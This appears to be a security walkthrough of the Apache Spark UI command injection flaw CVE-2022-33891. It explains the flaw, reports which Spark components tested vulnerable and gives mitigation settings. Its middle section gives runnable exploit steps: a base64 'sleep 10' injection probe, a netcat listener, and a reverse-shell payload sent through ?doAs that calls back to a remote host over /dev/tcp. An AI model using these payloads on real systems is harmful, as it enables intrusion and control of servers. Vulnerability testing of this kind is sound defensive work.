CVE-2022-33891 Apache Spark Command Injection Vulnerability

 

Please refer - https://spark.apache.org/security.html


  • The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by running a raw Linux command.
  • If an attacker sends reverse-shell commands through ?doAs, there is a high chance of the attacker gaining access to the Apache Spark server from their own machine.
Vulnerability description -

The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.
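
To make the code path concrete, below is a rough sketch of the kind of shell invocation the permission check ends up running for the ?doAs user. The exact command shape is an assumption based on the description above, not copied from the Spark source.

    # hedged sketch (assumed command shape): the group lookup for the impersonated
    # user is roughly equivalent to running
    bash -c "id -Gn <doAs user>"
    # so a ?doAs value containing backticks, e.g. `touch /tmp/pwned`, is expanded by
    # the shell and runs with the privileges of the user Spark is running as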


Vulnerable component includes only the Spark UI -
  • We tested the Spark History Server; it was not vulnerable.
    • https://<SparkServer>:18081/
  • We tested the Spark UI for a job started with the YARN master; it was also not vulnerable.
    • https://<SparkServer>:8090/proxy/application_1684801301953_15767/
    • https://<SparkServer>:4043/
  • We tested the Spark UI for a job started with the local master, and it tested positive for the vulnerability, i.e. we were able to perform command injection and execute shell commands on the Spark server from a remote machine.
    • https://<SparkServer>:4044/


  • Please clone the above git repository.
  • Install python3 and the following libraries required by the script - requests, argparse, colorama (a sample install command is shown below).
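
A minimal setup sketch, assuming pip3 is available (argparse already ships with Python 3, so only the other two libraries normally need installing):

    # install the libraries the exploit script imports
    pip3 install requests colorama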

  • Start spark-shell with --master local on one of the machines in your Hadoop cluster. This will start the Spark UI with a web URL like https://<SparkServer>:4044/ (see the sketch after this list for a sample launch command).
  • Let’s check whether this target (https://<SparkServer>:4044/) is vulnerable using the command below -
    • python3 exploit.py -u http://<Spark Server> -p 4044 --check --verbose
                  Note - the above command appends the doAs parameter to the URL and invokes it -
      • http://<Spark Server>:4044/?doAs='testing'
      • http://<Spark Server>:4044/?doAs=`echo c2xlZXAgMTA= | base64 -d | bash`
    • The script verifies the vulnerability by calling the two URLs above:
      • The first URL invocation tells whether the URL honours the ?doAs request parameter.
      • If ?doAs is not supported, there cannot be command injection, hence we are safe.
      • Second, it checks whether the "sleep 10" command executes on the remote server. If the response is delayed by about 10 seconds, the remote server is vulnerable; otherwise it is not. (How this base64 payload is built is sketched after this list.)
  • The above command tells you whether the URL is probably vulnerable or not.
  • Let’s use our exploit to start a reverse shell, so we can execute Unix commands on the server from a remote machine. But before that, start a netcat listener to capture the reverse-shell traffic, using the command below on a remote machine other than the Spark server.
    • nc -nvlp 9002
  • Let's use the exploit command to start the reverse shell.
    • python3 exploit.py -u http://<Spark Server> -p 4044 --revshell -lh <IP_OF_REMOTE_MACHINE_RUNNING_NETCAT> -lp 9002 --verbose
    • The above command opens an interactive shell on the Spark server that connects back to the netcat listener on the remote machine. Ex:
      • sh -i >& /dev/tcp/{IP_OF_REMOTE_MACHINE_RUNNING_NETCAT}/9002 0>&1
  • After this you should see a Unix shell on the machine that was running netcat. On this machine you can execute Unix shell commands, which will actually execute on the remote Spark server.
    • whoami
    • hostname
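
For reference, below is a rough sketch of the pieces used in the steps above. The spark-shell launch flags and the payload construction are assumptions based on this walkthrough (the exact commands the exploit script builds may differ); the base64 strings can be reproduced with plain shell tools.

    # 1. Start a local-master spark-shell on a cluster node; per the description above,
    #    the vulnerable code path is reachable when ACLs are enabled (assumed flag)
    spark-shell --master local --conf spark.acls.enable=true

    # 2. The --check probe's base64 payload is simply "sleep 10" encoded
    echo -n 'sleep 10' | base64     # prints c2xlZXAgMTA=

    # 3. The reverse-shell payload encodes the sh -i redirection shown above and is
    #    then injected as ?doAs=`echo <BASE64> | base64 -d | bash`
    echo -n 'sh -i >& /dev/tcp/<IP_OF_REMOTE_MACHINE_RUNNING_NETCAT>/9002 0>&1' | base64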

To mitigate the issue -
  • Cloudera suggests disabling the following properties (if enabled)
    • spark.history.ui.acls.enable / spark.acls.enable
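
A quick way to confirm the current settings on a node (the config file path below is an assumption and varies by distribution):

    # check whether the ACL flags are enabled in spark-defaults.conf
    grep -E 'spark\.(history\.ui\.)?acls\.enable' /etc/spark/conf/spark-defaults.conf
    # if either property is set to true, set it to false (or remove it) and restart the affected Spark services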
                        
